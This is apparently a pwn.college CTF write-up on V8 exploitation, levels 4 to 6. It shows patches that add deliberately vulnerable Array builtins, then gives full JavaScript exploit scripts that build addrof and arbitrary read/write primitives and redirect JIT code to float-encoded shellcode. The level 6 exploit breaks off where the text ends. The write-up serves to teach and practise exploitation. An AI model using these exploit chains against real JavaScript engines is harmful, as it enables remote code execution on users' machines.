[PWN COLELGE] - V8 Exploitation Part 2

index

Level 4

Patch Analysis

1
diff --git a/BUILD.gn b/BUILD.gn
2
index c0192593c4a..83e264723f7 100644
3
--- a/BUILD.gn
4
+++ b/BUILD.gn
5
@@ -1889,6 +1889,7 @@ if (v8_postmortem_support) {
6
 }
7

8
 torque_files = [
9
+  "src/builtins/array-setlength.tq",
10
   "src/builtins/aggregate-error.tq",
11
   "src/builtins/array-at.tq",
12
   "src/builtins/array-concat.tq",
13
diff --git a/src/builtins/array-setlength.tq b/src/builtins/array-setlength.tq
14
new file mode 100644
15
index 00000000000..4a2a864af44
16
--- /dev/null
17
+++ b/src/builtins/array-setlength.tq
18
@@ -0,0 +1,14 @@
19
+namespace array {
20
+transitioning javascript builtin
21
+ArrayPrototypeSetLength(
22
+  js-implicit context: NativeContext, receiver: JSAny)(length: JSAny): JSAny {
23
+    try {
24
+      const len: Smi = Cast<Smi>(length) otherwise ErrorLabel;
25
+      const array: JSArray = Cast<JSArray>(receiver) otherwise ErrorLabel;
26
+      array.length = len;
27
+    } label ErrorLabel {
28
+        Print("Nope");
29
+    }
30
+    return receiver;
31
+}
32
+}
33
diff --git a/src/d8/d8.cc b/src/d8/d8.cc
34
index facf0d86d79..382c015bc48 100644
35
--- a/src/d8/d8.cc
36
+++ b/src/d8/d8.cc
37
@@ -3364,7 +3364,7 @@ Local<FunctionTemplate> Shell::CreateNodeTemplates(
38

39
 Local<ObjectTemplate> Shell::CreateGlobalTemplate(Isolate* isolate) {
40
   Local<ObjectTemplate> global_template = ObjectTemplate::New(isolate);
41
-  global_template->Set(Symbol::GetToStringTag(isolate),
42
+/*  global_template->Set(Symbol::GetToStringTag(isolate),
43
                        String::NewFromUtf8Literal(isolate, "global"));
44
   global_template->Set(isolate, "version",
45
                        FunctionTemplate::New(isolate, Version));
46
@@ -3385,13 +3385,13 @@ Local<ObjectTemplate> Shell::CreateGlobalTemplate(Isolate* isolate) {
47
   global_template->Set(isolate, "readline",
48
                        FunctionTemplate::New(isolate, ReadLine));
49
   global_template->Set(isolate, "load",
50
-                       FunctionTemplate::New(isolate, ExecuteFile));
51
+                       FunctionTemplate::New(isolate, ExecuteFile));*/
52
   global_template->Set(isolate, "setTimeout",
53
                        FunctionTemplate::New(isolate, SetTimeout));
54
   // Some Emscripten-generated code tries to call 'quit', which in turn would
55
   // call C's exit(). This would lead to memory leaks, because there is no way
56
   // we can terminate cleanly then, so we need a way to hide 'quit'.
57
-  if (!options.omit_quit) {
58
+/*  if (!options.omit_quit) {
59
     global_template->Set(isolate, "quit", FunctionTemplate::New(isolate, Quit));
60
   }
61
   global_template->Set(isolate, "testRunner",
62
@@ -3410,7 +3410,7 @@ Local<ObjectTemplate> Shell::CreateGlobalTemplate(Isolate* isolate) {
63
   if (i::v8_flags.expose_async_hooks) {
64
     global_template->Set(isolate, "async_hooks",
65
                          Shell::CreateAsyncHookTemplate(isolate));
66
-  }
67
+  }*/
68

69
   return global_template;
70
 }
71
diff --git a/src/init/bootstrapper.cc b/src/init/bootstrapper.cc
72
index 48249695b7b..f3379ac47ec 100644
73
--- a/src/init/bootstrapper.cc
74
+++ b/src/init/bootstrapper.cc
75
@@ -2531,6 +2531,8 @@ void Genesis::InitializeGlobal(Handle<JSGlobalObject> global_object,
76
     JSObject::AddProperty(isolate_, proto, factory->constructor_string(),
77
                           array_function, DONT_ENUM);
78

79
+    SimpleInstallFunction(isolate_, proto, "setLength",
80
+                          Builtin::kArrayPrototypeSetLength, 1, true);
81
     SimpleInstallFunction(isolate_, proto, "at", Builtin::kArrayPrototypeAt, 1,
82
                           true);
83
     SimpleInstallFunction(isolate_, proto, "concat",

You can see that a new builtin ArrayPrototypeSetLength has been added to the Array prototype. This function attempts to set the length of an array to a given value, and if the value is not a Smi (small integer) or the receiver is not a JSArray, it prints “Nope”. And we can easily noticed that their is a Out-of-Bound bug here, if we set the length of an array more than its allocated size, it will lead to OOB access.

Exploit

The exploit methodology is starghtforward, we create two arrays a and b, then we use the vulnerable setLength function to increase the length of these arrays. And then archive Addrof, Arbitrary Read and Arbitrary Write primitives by manipulating the elements pointer of the array. Finally, we overwrite the RWX memory with shellcode and execute it.


49 collapsed lines
1
var f64 = new Float64Array(1);
2
var bigUint64 = new BigUint64Array(f64.buffer);
3
var u32 = new Uint32Array(f64.buffer);
4

5
function hex(i) {
6
    return i.toString(16).padStart(8, "0");
7
}
8

9
function i2f(i) {
10
    bigUint64[0] = i;
11
    return f64[0];
12
}
13

14
function f2i(i) {
15
    f64[0] = i;
16
    return bigUint64[0];
17
}
18

19
function u2f(low, high) {
20
    u32[0] = low;
21
    u32[1] = high;
22
    return f64[0];
23
}
24

25
function u2i(low, high) {
26
    u32[0] = low;
27
    u32[1] = high;
28
    return bigUint64[0];
29
}
30

31
function i2u_l(i) {
32
    bigUint64[0] = i;
33
    return u32[0];
34
}
35

36
function i2u_h(i) {
37
    bigUint64[0] = i;
38
    return u32[1];
39
}
40

41
const logInfo = (m) => console.log(`[*] ${m}`);
42
const logOK = (m) => console.log(`[+] ${m}`);
43
const logErr = (m) => console.log(`[-] ${m}`);
44

45
function toHex(x, w = 16) {
46
    x = BigInt.asUintN(64, BigInt(x));
47
    return "0x" + x.toString(16).padStart(w, "0");
48
}
49

50
function AddrOf(target) {
51
    obj[0] = target;
52
    b[0x100] = u2f(double_array_map, double_prototype);
53
    return i2u_l(f2i(obj[0]));
54
}
55

56
function ArbRead(addr) {
57
    b[0x100] = u2f(double_array_map, double_prototype);
58
    b[0x101] = u2f(addr - 0x8 + 1, 100);
59
    return f2i(obj[0]);
60
}
61

62
function ArbWrite(addr, value) {
63
    b[0x100] = u2f(double_array_map, double_prototype);
64
    b[0x101] = u2f(addr - 0x8 + 1, 100);
65
    obj[0] = i2f(value);
66
}
67

68
const shellcode = () => {
69
    return [
70
        1.9995716422075807e-246,
71
        1.9710255944286777e-246,
72
        1.97118242283721e-246,
73
        1.971136949489835e-246,
74
        1.9711826272869888e-246,
75
        1.9711829003383248e-246,
76
        -9.254983612527998e+61
77
    ];
78
}
79

80
for (let i = 0; i < 10000; i++) {
81
    shellcode();
82
}
83

84
let a = new Array(0x100).fill(1.1)
85
let b = new Array(0x100).fill(2.2);
86
let obj = { a, b };
87

88
// Get out of bounds
89
{
90
    a.setLength(0x110);
91
    b.setLength(0x110);
92
}
93

94
let double_array_map = i2u_l(f2i(a[0x100]));
95
let double_prototype = i2u_h(f2i(a[0x100]));
96
let double_element = i2u_l(f2i(a[0x101]));
97

98
logInfo("double_array_map: " + toHex(double_array_map));
99
logInfo("double_prototype: " + toHex(double_prototype));
100
logInfo("double_element: " + toHex(double_element));
101

102
// %DebugPrint(shellcode);
103

104
let shellcode_addr = AddrOf(shellcode) - 1;
105
logOK("shellcode addr: " + toHex(shellcode_addr));
106

107
let code_ptr = i2u_l(ArbRead(shellcode_addr + 0xc)) - 1;
108
logOK("code ptr: " + toHex(code_ptr));
109

110
let rwx_addr = ArbRead(code_ptr + 0x14);
111
logOK("rwx addr: " + toHex(rwx_addr));
112

113
let shellcode_start = rwx_addr + 0x69n + 0x2n;
114
logInfo("shellcode start at: " + toHex(shellcode_start));
115

116
logInfo("Overwrite code ptr to shellcode");
117
ArbWrite(code_ptr + 0x14, shellcode_start);
118

119
// %SystemBreak();
120
shellcode();

Few things we need to note here is that we don’t need ‘FakeObj’ primitive, just because we can directly manipulate the element pointer and length of the array to achieve arbitrary read and write. Moreover, we can use Garbage Collector for stabilizing the addresses of our objects. So that we can easily calculate the OOB index without worrying about the index getting changed.

Level 5

Patch Analysis

1
diff --git a/src/builtins/builtins-array.cc b/src/builtins/builtins-array.cc
2
index ea45a7ada6b..4ed66c8113f 100644
3
--- a/src/builtins/builtins-array.cc
4
+++ b/src/builtins/builtins-array.cc
5
@@ -407,6 +407,46 @@ BUILTIN(ArrayPush) {
6
   return *isolate->factory()->NewNumberFromUint((new_length));
7
 }
8

9
+BUILTIN(ArrayOffByOne) {
10
+       HandleScope scope(isolate);
11
+       Factory *factory = isolate->factory();
12
+       Handle<Object> receiver = args.receiver();
13
+
14
+       if (!IsJSArray(*receiver) || !HasOnlySimpleReceiverElements(isolate, Cast<JSArray>(*receiver))) {
15
+         THROW_NEW_ERROR_RETURN_FAILURE(isolate, NewTypeError(MessageTemplate::kPlaceholderOnly,
16
+       factory->NewStringFromAsciiChecked("Nope")));
17
+       }
18
+
19
+       Handle<JSArray> array = Cast<JSArray>(receiver);
20
+
21
+       ElementsKind kind = array->GetElementsKind();
22
+
23
+       if (kind != PACKED_DOUBLE_ELEMENTS) {
24
+         THROW_NEW_ERROR_RETURN_FAILURE(isolate, NewTypeError(MessageTemplate::kPlaceholderOnly,
25
+       factory->NewStringFromAsciiChecked("Need an array of double numbers")));
26
+       }
27
+
28
+       if (args.length() > 2) {
29
+         THROW_NEW_ERROR_RETURN_FAILURE(isolate, NewTypeError(MessageTemplate::kPlaceholderOnly,
30
+       factory->NewStringFromAsciiChecked("Too many arguments")));
31
+       }
32
+
33
+       Handle<FixedDoubleArray> elements(Cast<FixedDoubleArray>(array->elements()), isolate); // get the elements
34
+       uint32_t len = static_cast<uint32_t>(Object::NumberValue(array->length())); // get the length
35
+       if (args.length() == 1) {       // read mode
36
+               return *(isolate->factory()->NewNumber(elements->get_scalar(len)));
37
+       } else {        // write mode
38
+               Handle<Object> value = args.at(1);
39
+               if (!IsNumber(*value)) {
40
+                 THROW_NEW_ERROR_RETURN_FAILURE(isolate, NewTypeError(MessageTemplate::kPlaceholderOnly,
41
+               factory->NewStringFromAsciiChecked("Need a number argument")));
42
+               }
43
+               double num = static_cast<double>(Object::NumberValue(*value));
44
+               elements->set(len, num);
45
+               return ReadOnlyRoots(isolate).undefined_value();
46
+       }
47
+}
48
+
49
 namespace {
50

51
 V8_WARN_UNUSED_RESULT Tagged<Object> GenericArrayPop(Isolate* isolate,
52
diff --git a/src/builtins/builtins-definitions.h b/src/builtins/builtins-definitions.h
53
index 78cbf8874ed..8a0bd959a29 100644
54
--- a/src/builtins/builtins-definitions.h
55
+++ b/src/builtins/builtins-definitions.h
56
@@ -394,6 +394,7 @@ namespace internal {
57
       ArraySingleArgumentConstructor)                                          \
58
   TFC(ArrayNArgumentsConstructor, ArrayNArgumentsConstructor)                  \
59
   CPP(ArrayConcat)                                                             \
60
+  CPP(ArrayOffByOne)                                                           \
61
   /* ES6 #sec-array.prototype.fill */                                          \
62
   CPP(ArrayPrototypeFill)                                                      \
63
   /* ES7 #sec-array.prototype.includes */                                      \
64
diff --git a/src/compiler/typer.cc b/src/compiler/typer.cc
65
index 9a346d134b9..ce31f92b876 100644
66
--- a/src/compiler/typer.cc
67
+++ b/src/compiler/typer.cc
68
@@ -1937,6 +1937,8 @@ Type Typer::Visitor::JSCallTyper(Type fun, Typer* t) {
69
       return Type::Receiver();
70
     case Builtin::kArrayUnshift:
71
       return t->cache_->kPositiveSafeInteger;
72
+       case Builtin::kArrayOffByOne:
73
+         return Type::Receiver();
74

75
     // ArrayBuffer functions.
76
     case Builtin::kArrayBufferIsView:
77
diff --git a/src/d8/d8.cc b/src/d8/d8.cc
78
index facf0d86d79..382c015bc48 100644
79
--- a/src/d8/d8.cc
80
+++ b/src/d8/d8.cc
81
@@ -3364,7 +3364,7 @@ Local<FunctionTemplate> Shell::CreateNodeTemplates(
82

83
 Local<ObjectTemplate> Shell::CreateGlobalTemplate(Isolate* isolate) {
84
   Local<ObjectTemplate> global_template = ObjectTemplate::New(isolate);
85
-  global_template->Set(Symbol::GetToStringTag(isolate),
86
+/*  global_template->Set(Symbol::GetToStringTag(isolate),
87
                        String::NewFromUtf8Literal(isolate, "global"));
88
   global_template->Set(isolate, "version",
89
                        FunctionTemplate::New(isolate, Version));
90
@@ -3385,13 +3385,13 @@ Local<ObjectTemplate> Shell::CreateGlobalTemplate(Isolate* isolate) {
91
   global_template->Set(isolate, "readline",
92
                        FunctionTemplate::New(isolate, ReadLine));
93
   global_template->Set(isolate, "load",
94
-                       FunctionTemplate::New(isolate, ExecuteFile));
95
+                       FunctionTemplate::New(isolate, ExecuteFile));*/
96
   global_template->Set(isolate, "setTimeout",
97
                        FunctionTemplate::New(isolate, SetTimeout));
98
   // Some Emscripten-generated code tries to call 'quit', which in turn would
99
   // call C's exit(). This would lead to memory leaks, because there is no way
100
   // we can terminate cleanly then, so we need a way to hide 'quit'.
101
-  if (!options.omit_quit) {
102
+/*  if (!options.omit_quit) {
103
     global_template->Set(isolate, "quit", FunctionTemplate::New(isolate, Quit));
104
   }
105
   global_template->Set(isolate, "testRunner",
106
@@ -3410,7 +3410,7 @@ Local<ObjectTemplate> Shell::CreateGlobalTemplate(Isolate* isolate) {
107
   if (i::v8_flags.expose_async_hooks) {
108
     global_template->Set(isolate, "async_hooks",
109
                          Shell::CreateAsyncHookTemplate(isolate));
110
-  }
111
+  }*/
112

113
   return global_template;
114
 }
115
diff --git a/src/init/bootstrapper.cc b/src/init/bootstrapper.cc
116
index 48249695b7b..99dc014c13c 100644
117
--- a/src/init/bootstrapper.cc
118
+++ b/src/init/bootstrapper.cc
119
@@ -2533,6 +2533,8 @@ void Genesis::InitializeGlobal(Handle<JSGlobalObject> global_object,
120

121
     SimpleInstallFunction(isolate_, proto, "at", Builtin::kArrayPrototypeAt, 1,
122
                           true);
123
+    SimpleInstallFunction(isolate_, proto, "offByOne",
124
+                          Builtin::kArrayOffByOne, 1, false);
125
     SimpleInstallFunction(isolate_, proto, "concat",
126
                           Builtin::kArrayPrototypeConcat, 1, false);
127
     SimpleInstallFunction(isolate_, proto, "copyWithin",

In this patch, a new builtin ArrayOffByOne has been added to the Array prototype. This function allows reading and writing to an out-of-bounds index of a packed double array. But it only allow us to OOB read/write 8 bytes which we can just read/write map and property of target object.

Exploit

To exploit this level, we first need to know about v8 Fast-Properties. We need to focus on these concept:

Named properties vs. elements
- Named properties: Regular string-keyed fields on objects, e.g. { a: 1, b: 2 } or obj["name"]. V8 stores them in a dedicated properties store.
- Elements: Integer-indexed properties (array indices), most common on arrays, e.g. arr[0], arr[1]. V8 stores them separately in an elements store.
- This split (properties store vs. elements store) lets V8 optimize common patterns: array operations over consecutive indices vs. object property lookups.
In-object vs. normal properties
- In-object properties are stored directly inside the object’s own memory layout. They’re the fastest because accessing them needs no extra pointer dereference.
- The number of in-object slots is decided up front (based on the object’s “initial size”). If you add more properties than there is space for, V8 stores the overflow as normal properties in the separate properties store, adding one level of indirection.
Fast vs. slow properties
- Fast properties use a compact, index-based layout in the properties store. V8 uses the object’s HiddenClass + descriptor array to map a property name to an index, which enables fast access and optimizations like inline caches.
- Slow properties (dictionary mode) store properties in a self-contained dictionary (hash-table-like). This avoids the overhead of constantly updating HiddenClasses/descriptors when properties are frequently added/removed, but it’s typically slower for access and doesn’t work well with inline caches.

Pain enough right? Let’s take an example to understand this better:

1
let arr = [1.1, 2.2, 3.3]; // elements
2
let obj = { in1: 10, in2: 20 }; // in-object properties
3
obj.out1 = 30; // normal properties
4
obj.out2 = 40; // normal properties
5

6
%DebugPrint(arr);
7
%DebugPrint(obj);

Let’s debug in GDB:

1
pwndbg> job 0x2f6800042ab9
2
0x2f6800042ab9: [JS_OBJECT_TYPE]
3
 - map: 0x2f68001d3575 <Map[20](HOLEY_ELEMENTS)> [FastProperties]
4
 - prototype: 0x2f68001c10ed <Object map = 0x2f68001c0701>
5
 - elements: 0x2f6800000725 <FixedArray[0]> [HOLEY_ELEMENTS]
6
 - properties: 0x2f6800042b45 <PropertyArray[3]>
7
 - All own properties (excluding elements): {
8
    0x2f68001d3349: [String] in OldSpace: #in1: 10 (const data field 0, attrs: [WEC]) @ Any, location: in-object
9
    0x2f68001d3359: [String] in OldSpace: #in2: 20 (const data field 1, attrs: [WEC]) @ Any, location: in-object
10
    0x2f68001d3369: [String] in OldSpace: #out1: 30 (const data field 2, attrs: [WEC]) @ Any, location: properties[0]
11
    0x2f68001d3379: [String] in OldSpace: #out2: 40 (const data field 3, attrs: [WEC]) @ Any, location: properties[1]
12
 }
13
pwndbg> x/10wx 0x2f6800042ab9-1
14
0x2f6800042ab8: 0x001d3575      0x00042b45      0x00000725      [0x00000014]
15
0x2f6800042ac8: [0x00000028]    0x00000685      0x00010001      0x00000000
16
0x2f6800042ad8: 0x0000074d      0x001d3349
17
pwndbg> p/d 0x14 >> 1
18
$3 = 10
19
pwndbg> p/d 0x28 >> 1
20
$4 = 20

You can see that the first two properties in1 and in2 are stored in-object, while out1 and out2 are stored in the properties array.

1
pwndbg> job 0x2f6800042b45
2
0x2f6800042b45: [PropertyArray]
3
 - map: 0x2f6800000999 <Map(PROPERTY_ARRAY_TYPE)>
4
 - length: 3
5
 - hash: 0
6
           0: 30
7
           1: 40
8
           2: 0x2f6800000069 <undefined>
9
pwndbg> x/10wx 0x2f6800042b45-1
10
0x2f6800042b44: 0x00000999      0x00000006      [0x0000003c]    [0x00000050]
11
0x2f6800042b54: 0x00000069      0x00000685      0x00040004      0x00000000
12
0x2f6800042b64: 0x0000074d      0x001d3349
13
pwndbg> p/d 0x0000003c >> 1
14
$5 = 30
15
pwndbg> p/d 0x00000050 >> 1
16
$6 = 40

We can notice that the layout of the properties array is pretty simple [map][length][out1][out2].... So if we modified the properties pointer of the object, fengshui for out1 or out2 to point exactly at lenght field of any array, we can lead that array OOB by changing it length obj.out1/obj.out2 = newLength. Now, everything is the same as at the previous level.

1
var f64 = new Float64Array(1);
2
var bigUint64 = new BigUint64Array(f64.buffer);
3
var u32 = new Uint32Array(f64.buffer);
4

5
function hex(i) {
6
    return i.toString(16).padStart(8, "0");
7
}
8

9
function i2f(i) {
10
    bigUint64[0] = i;
11
    return f64[0];
12
}
13

14
function f2i(i) {
15
    f64[0] = i;
16
    return bigUint64[0];
17
}
18

19
function u2f(low, high) {
20
    u32[0] = low;
21
    u32[1] = high;
22
    return f64[0];
23
}
24

25
function u2i(low, high) {
26
    u32[0] = low;
27
    u32[1] = high;
28
    return bigUint64[0];
29
}
30

31
function i2u_l(i) {
32
    bigUint64[0] = i;
33
    return u32[0];
34
}
35

36
function i2u_h(i) {
37
    bigUint64[0] = i;
38
    return u32[1];
39
}
40

41
const logInfo = (m) => console.log(`[*] ${m}`);
42
const logOK = (m) => console.log(`[+] ${m}`);
43
const logErr = (m) => console.log(`[-] ${m}`);
44

45
function toHex(x, w = 16) {
46
    x = BigInt.asUintN(64, BigInt(x));
47
    return "0x" + x.toString(16).padStart(w, "0");
48
}
49

50
function shellcode() {
51
    return [
52
        1.9995716422075807e-246,
53
        1.9710255944286777e-246,
54
        1.97118242283721e-246,
55
        1.971136949489835e-246,
56
        1.9711826272869888e-246,
57
        1.9711829003383248e-246,
58
        -9.254983612527998e+61
59
    ];
60
}
61

62
for (let i = 0; i < 10000; i++) shellcode();
63

64
let a = [1.1];
65
let obj = { in1: 1 };
66
obj.out1 = 2;
67
obj.out2 = 3;
68

69
let temp = f2i(a.offByOne()); //map, properties
70
let obj_array_map = i2u_l(temp);
71

72
let array_addr = i2u_h(temp) - 0x7c;
73
a.offByOne(u2f(obj_array_map, array_addr));
74
obj.out2 = 0x1000; //a.len = 0x1000;
75

76
let b = [2.2, 3.3, 4.4];
77

78
temp = f2i(a[54]);
79
let double_array_map = i2u_l(temp);
80
let double_properties = i2u_h(temp);
81

82
function GetAddressOf(target) {
83
    a[54] = u2f(obj_array_map, 0);
84
    b[0] = target;
85
    a[54] = u2f(double_array_map, 0);
86
    return f2i(b[0]);
87
}
88

89
function GetFakeObject(addr) {
90
    a[54] = u2f(double_array_map, 0);
91
    b[0] = u2f(addr, 0);
92
    a[54] = u2f(obj_array_map, 0);
93
    return b[0];
94
}
95

96
let shellcode_addr = GetAddressOf(shellcode);
97

98
let fake_array = [u2f(double_array_map, 0), u2f(i2u_l(shellcode_addr) - 0x8, 100)];
99
let fake_array_addr = GetAddressOf(fake_array);
100
let fake_obj = GetFakeObject(i2u_l(fake_array_addr) + 0x54);
101

102
function ArbRead64(addr) {
103
    fake_array[1] = u2f(addr - 8 + 1, 100);
104
    return f2i(fake_obj[0]);
105
}
106

107
function ArbWrite64(addr, data) {
108
    fake_array[1] = u2f(addr - 8 + 1, 100);
109
    fake_obj[0] = i2f(data);
110
}
111

112
let code_addr = ArbRead64(i2u_l(shellcode_addr) + 0xc - 1);
113
let machine_code_addr = ArbRead64(i2u_l(code_addr) - 1 + 0x14);
114
let malice = machine_code_addr + 0x6bn;
115
ArbWrite64(i2u_l(code_addr) - 1 + 0x14, malice);
116

117
shellcode();

Level 6

Patch Analysis

1
diff --git a/src/builtins/builtins-array.cc b/src/builtins/builtins-array.cc
2
index ea45a7ada6b..d450412f3e6 100644
3
--- a/src/builtins/builtins-array.cc
4
+++ b/src/builtins/builtins-array.cc
5
@@ -407,6 +407,53 @@ BUILTIN(ArrayPush) {
6
   return *isolate->factory()->NewNumberFromUint((new_length));
7
 }
8

9
+BUILTIN(ArrayFunctionMap) {
10
+  HandleScope scope(isolate);
11
+  Factory *factory = isolate->factory();
12
+  Handle<Object> receiver = args.receiver();
13
+
14
+  if (!IsJSArray(*receiver) || !HasOnlySimpleReceiverElements(isolate, Cast<JSArray>(*receiver))) {
15
+    THROW_NEW_ERROR_RETURN_FAILURE(isolate, NewTypeError(MessageTemplate::kPlaceholderOnly,
16
+      factory->NewStringFromAsciiChecked("Nope")));
17
+  }
18
+
19
+  Handle<JSArray> array = Cast<JSArray>(receiver);
20
+
21
+  ElementsKind kind = array->GetElementsKind();
22
+
23
+  if (kind != PACKED_DOUBLE_ELEMENTS) {
24
+    THROW_NEW_ERROR_RETURN_FAILURE(isolate, NewTypeError(MessageTemplate::kPlaceholderOnly,
25
+      factory->NewStringFromAsciiChecked("Need an array of double numbers")));
26
+  }
27
+
28
+  if (args.length() != 2) {
29
+    THROW_NEW_ERROR_RETURN_FAILURE(isolate, NewTypeError(MessageTemplate::kPlaceholderOnly,
30
+      factory->NewStringFromAsciiChecked("Need exactly one argument")));
31
+  }
32
+
33
+  uint32_t len = static_cast<uint32_t>(Object::NumberValue(array->length()));
34
+
35
+  Handle<Object> func_obj = args.at(1);
36
+  if (!IsJSFunction(*func_obj)) {
37
+    THROW_NEW_ERROR_RETURN_FAILURE(isolate, NewTypeError(MessageTemplate::kPlaceholderOnly,
38
+      factory->NewStringFromAsciiChecked("The argument must be a function")));
39
+  }
40
+
41
+  for (uint32_t i = 0; i < len; i++) {
42
+    double elem = Cast<FixedDoubleArray>(array->elements())->get_scalar(i);
43
+    Handle<Object> elem_handle = factory->NewHeapNumber(elem);
44
+    Handle<Object> result = Execution::Call(isolate, func_obj, array, 1, &elem_handle).ToHandleChecked(); // get the return value
45
+    if (!IsNumber(*result)) {
46
+      THROW_NEW_ERROR_RETURN_FAILURE(isolate, NewTypeError(MessageTemplate::kPlaceholderOnly,
47
+        factory->NewStringFromAsciiChecked("The function must return a number")));
48
+    }
49
+    double result_value = static_cast<double>(Object::NumberValue(*result));
50
+    Cast<FixedDoubleArray>(array->elements())->set(i, result_value);
51
+  }
52
+
53
+  return ReadOnlyRoots(isolate).undefined_value();
54
+}
55
+
56
 namespace {
57

58
 V8_WARN_UNUSED_RESULT Tagged<Object> GenericArrayPop(Isolate* isolate,
59
diff --git a/src/builtins/builtins-definitions.h b/src/builtins/builtins-definitions.h
60
index 78cbf8874ed..ede2775903e 100644
61
--- a/src/builtins/builtins-definitions.h
62
+++ b/src/builtins/builtins-definitions.h
63
@@ -394,6 +394,7 @@ namespace internal {
64
       ArraySingleArgumentConstructor)                                          \
65
   TFC(ArrayNArgumentsConstructor, ArrayNArgumentsConstructor)                  \
66
   CPP(ArrayConcat)                                                             \
67
+  CPP(ArrayFunctionMap)                                                        \
68
   /* ES6 #sec-array.prototype.fill */                                          \
69
   CPP(ArrayPrototypeFill)                                                      \
70
   /* ES7 #sec-array.prototype.includes */                                      \
71
diff --git a/src/compiler/typer.cc b/src/compiler/typer.cc
72
index 9a346d134b9..33cf2d2edad 100644
73
--- a/src/compiler/typer.cc
74
+++ b/src/compiler/typer.cc
75
@@ -1937,6 +1937,8 @@ Type Typer::Visitor::JSCallTyper(Type fun, Typer* t) {
76
       return Type::Receiver();
77
     case Builtin::kArrayUnshift:
78
       return t->cache_->kPositiveSafeInteger;
79
+  case Builtin::kArrayFunctionMap:
80
+    return Type::Receiver();
81

82
     // ArrayBuffer functions.
83
     case Builtin::kArrayBufferIsView:
84
diff --git a/src/d8/d8.cc b/src/d8/d8.cc
85
index facf0d86d79..382c015bc48 100644
86
--- a/src/d8/d8.cc
87
+++ b/src/d8/d8.cc
88
@@ -3364,7 +3364,7 @@ Local<FunctionTemplate> Shell::CreateNodeTemplates(
89

90
 Local<ObjectTemplate> Shell::CreateGlobalTemplate(Isolate* isolate) {
91
   Local<ObjectTemplate> global_template = ObjectTemplate::New(isolate);
92
-  global_template->Set(Symbol::GetToStringTag(isolate),
93
+/*  global_template->Set(Symbol::GetToStringTag(isolate),
94
                        String::NewFromUtf8Literal(isolate, "global"));
95
   global_template->Set(isolate, "version",
96
                        FunctionTemplate::New(isolate, Version));
97
@@ -3385,13 +3385,13 @@ Local<ObjectTemplate> Shell::CreateGlobalTemplate(Isolate* isolate) {
98
   global_template->Set(isolate, "readline",
99
                        FunctionTemplate::New(isolate, ReadLine));
100
   global_template->Set(isolate, "load",
101
-                       FunctionTemplate::New(isolate, ExecuteFile));
102
+                       FunctionTemplate::New(isolate, ExecuteFile));*/
103
   global_template->Set(isolate, "setTimeout",
104
                        FunctionTemplate::New(isolate, SetTimeout));
105
   // Some Emscripten-generated code tries to call 'quit', which in turn would
106
   // call C's exit(). This would lead to memory leaks, because there is no way
107
   // we can terminate cleanly then, so we need a way to hide 'quit'.
108
-  if (!options.omit_quit) {
109
+/*  if (!options.omit_quit) {
110
     global_template->Set(isolate, "quit", FunctionTemplate::New(isolate, Quit));
111
   }
112
   global_template->Set(isolate, "testRunner",
113
@@ -3410,7 +3410,7 @@ Local<ObjectTemplate> Shell::CreateGlobalTemplate(Isolate* isolate) {
114
   if (i::v8_flags.expose_async_hooks) {
115
     global_template->Set(isolate, "async_hooks",
116
                          Shell::CreateAsyncHookTemplate(isolate));
117
-  }
118
+  }*/
119

120
   return global_template;
121
 }
122
diff --git a/src/init/bootstrapper.cc b/src/init/bootstrapper.cc
123
index 48249695b7b..5e76e66bc15 100644
124
--- a/src/init/bootstrapper.cc
125
+++ b/src/init/bootstrapper.cc
126
@@ -2533,6 +2533,8 @@ void Genesis::InitializeGlobal(Handle<JSGlobalObject> global_object,
127

128
     SimpleInstallFunction(isolate_, proto, "at", Builtin::kArrayPrototypeAt, 1,
129
                           true);
130
+  SimpleInstallFunction(isolate_, proto, "functionMap",
131
+                        Builtin::kArrayFunctionMap, 1, false);
132
     SimpleInstallFunction(isolate_, proto, "concat",
133
                           Builtin::kArrayPrototypeConcat, 1, false);
134
     SimpleInstallFunction(isolate_, proto, "copyWithin",

This patch pretty interesting for me, it adds a new builtin ArrayFunctionMap to the Array prototype. This function takes a function as an argument and applies it to each element of a packed double array, replacing the element with the return value of the function. Although the check is performed to ensure that our array is of type PACKED_DOUBLE_ELEMENTS, but in the loop, there is no type check while executing the function, and we know JavaScript is a dynamically typed language, so we can change the type of our array during the loop execution by modify it element. The bultin still then tries to cast the array element as FixedDoubleArray, which elements_kind is now changed, leading to type confusion.

Exploit

Far enough, let’s see this example:

1
let arr = [1.1, 1.1, 1.1];
2
let obj = {};
3
let obj_addr = undefined;
4
let idx = 0;
5

6
arr.functionMap((value) => {
7
    switch (idx) {
8
        case 0:
9
            arr[0] = obj;
10
            idx++;
11
            %DebugPrint(arr);
12
            return value;
13
        case 1:
14
            obj_addr = value;
15
            idx++;
16
            return value;
17
        default:
18
            idx++;
19
            return value;
20
    }
21
});
22

23
console.log(obj_addr);
24
%SystemBreak();

When we run this code, during the first iteration of the loop, we change the type of arr from PACKED_DOUBLE_ELEMENTS to PACKED_ELEMENTS by setting arr[0] = obj. In the next index access, in this case arr[1], the builtin still tries to cast the element as FixedDoubleArray, leading to type confusion. By viewing the debugger, we noticed that most of the time, when it try to access the value of arr[1], the value is always the address of index 2 backing store address

1
DebugPrint: 0x30d500042ba5: [JSArray]
2
 - map: 0x30d5001cb8a1 <Map[16](PACKED_ELEMENTS)> [FastProperties]
3
 - prototype: 0x30d5001cb179 <JSArray[0]>
4
 - elements: 0x30d500042bf9 <FixedArray[3]> [PACKED_ELEMENTS]
5
 - length: 3
6
 - properties: 0x30d500000725 <FixedArray[0]>
7
 - All own properties (excluding elements): {
8
    0x30d500000d99: [String] in ReadOnlySpace: #length: 0x30d500025ff1 <AccessorInfo name= 0x30d500000d99 <String[6]: #length>, data= 0x30d500000069 <undefined>> (const accessor descriptor, attrs: [W__]), location: descriptor
9
 }
10
 - elements: 0x30d500042bf9 <FixedArray[3]> {
11
           0: 0x30d500042bb5 <Object map = 0x30d5001c0f21> # Backing store address of index 0
12
           1: 0x30d500042c19 <HeapNumber 1.1> # Backing store address of index 1
13
           2: 0x30d500042c0d <HeapNumber 1.1> # Backing store address of index 2
14
 }
15
pwndbg> x/10xg 0x30d500042bf9-1
16
0x30d500042bf8: 0x000000060000056d      0x3ff199999999999a
17
0x30d500042c08: [0x0000080900042c0d]    0x3ff199999999999a
18
0x30d500042c18: 0x9999999a00000809      0x000008093ff19999
19
0x30d500042c28: 0x3ff199999999999a      0x00042c0d00000809
20
0x30d500042c38: 0x0000080900000809      0x3ff199999999999a

So if we let arr[2] = obj, then when the builtin try to access arr[1], it will read the backing store address of index 2 which is now pointing to obj. Thus, we can leak the address of any object by placing it at arr[2]. With that idea, we can now easily craft our exploit:


52 collapsed lines
1
var buf = new ArrayBuffer(8);
